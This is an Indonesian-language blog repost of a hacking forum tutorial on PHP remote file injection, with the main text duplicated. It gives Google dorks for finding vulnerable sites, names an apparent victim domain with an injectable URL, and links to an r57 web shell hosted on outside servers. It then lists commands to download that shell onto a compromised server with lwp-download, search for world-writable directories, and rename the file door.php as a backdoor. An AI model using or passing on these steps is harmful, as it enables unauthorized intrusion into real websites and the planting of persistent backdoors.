PHP injection...
pertama2 kita buka google.com
kita memasuk kan keyword nya di sana...
keyword nya yg di maksudkan di sini adalah dork,.. [bisa di lihat di millw0rm.com cari sendiri yg laen]
Kita mulai saja!
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
allinurl%3Aindex.php%3Fa%3Ddisplay
allinurl:index.php?a=display
allinurl <=- mencari setiap kata pada url...
index.php?a=display
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
http://www.historywebsites.com//index.php?a=display <=- tampil pada google..
http://www.historywebsites.com// <=- victim domain
index.php?a=display <=- DORK... kata kunci pada google...
http://www.historywebsites.com/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
www.[domain].com/[path]/[file]?[BUGS]=[injector]?
injektor nya ada di link..
http://www.geocities.com/yogya_hack/becak.tar.gz
http://evilarmy.hostcentric.com/becak.tar.gz
PostDikirim: Sen Jun 11, 2007 7:40 pm Judul: [Tutorial] PHP injection! [+contoh SHELL] Balas dengan kutipan
Hello World!
mungkin tutorial ini rada basi sih.. cma /me cma mo share azah!
anak2 demohacking pasti da pada tau..
PHP injection...
pertama2 kita buka google.com
kita memasuk kan keyword nya di sana...
keyword nya yg di maksudkan di sini adalah dork,.. [bisa di lihat di millw0rm.com cari sendiri yg laen]
Kita mulai saja!
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
allinurl%3Aindex.php%3Fa%3Ddisplay
allinurl:index.php?a=display
allinurl <=- mencari setiap kata pada url...
index.php?a=display
sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
http://www.historywebsites.com//index.php?a=display <=- tampil pada google..
http://www.historywebsites.com// <=- victim domain
index.php?a=display <=- DORK... kata kunci pada google...
http://www.historywebsites.com/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=
wwww.[domain].com/[path]/[file]?[BUGS]=[injector]?
injektor nya ada di link..
Quote:
http://www.geocities.com/yogya_hack/becak.tar.gz
Quote:
http://evilarmy.hostcentric.com/becak.tar.gz
itu adalah r57
hmm....
kalau sudah masuk ke web nya.. jangan lupa pasang backdoor...
cara nya ..
lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz;ls -lia
jgn lupa... letak kan file nya di direktory yg permission drwxrwxrwx
find . -type d -perm 777
cari dari direktori skr sebuah direktori lain yang bisa di tlis...
find . -type f -perm 777 <=- mencari file
find / -type d -perm 777 <=- mencari dari direktori / (root)
Backdoor PHP
1. lwp-download http://www.geocities.com/yogya_hack/becak.tar.gz
2. mv becak.tar.gz door.php
Contoh Hasil Site backdoor:
http://www.target.com/[path]/door.php
skip to main |
skip to sidebar
Blog Archive
-
►
2010
(483)
- ► 07/18 - 07/25 (8)
- ► 06/20 - 06/27 (9)
- ► 06/13 - 06/20 (29)
- ► 05/23 - 05/30 (18)
- ► 05/09 - 05/16 (23)
- ► 05/02 - 05/09 (3)
- ► 03/07 - 03/14 (65)
- ► 02/28 - 03/07 (55)
- ► 02/21 - 02/28 (59)
- ► 02/14 - 02/21 (106)
- ► 02/07 - 02/14 (61)
- ► 01/31 - 02/07 (47)
My Banner
Berbincang
|
|
Followers
Search
© 2009 There Are Secret. Powered by Blogger
No response to “PHP injection”
Posting Komentar